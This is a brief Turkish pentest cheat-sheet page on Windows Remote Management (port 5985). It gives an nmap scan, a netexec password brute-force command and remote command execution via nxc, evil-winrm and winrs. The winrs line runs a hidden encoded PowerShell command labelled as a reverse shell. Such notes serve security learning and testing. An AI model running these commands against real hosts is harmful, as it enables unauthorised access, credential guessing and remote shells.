WinRM - 5985

Winrm Nedir?

WinRM (Windows Remote Management), Windows işletim sistemlerinde uzaktan yönetim görevlerini gerçekleştirmek için kullanılan bir protokoldür.
Sistem yöneticilerinin uzaktaki Windows makinelerinde komutlar çalıştırmasını, yapılandırma değişiklikleri yapmasını ve sistem bilgilerini toplamasını sağlar.

Genel Bilgiler

nmap -sV -sC -p5985,5986 --disable-arp-ping -n 10.129.201.248

Brute Force

nxc winrm 192.168.1.2 -u john -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Komut Çalıştırma

nxc winrm 192.168.1.2 -u john -p pass123 -x "whoami"
evil-winrm -u john -p 'pass123' -i 192.168.1.2
winrs -r:192.168.246.72 -u:john -p:pass123 "powershell -nop -w hidden -e base64_rev"

PreviousSMB (445)NextFTP - 21

Last updated 10 months ago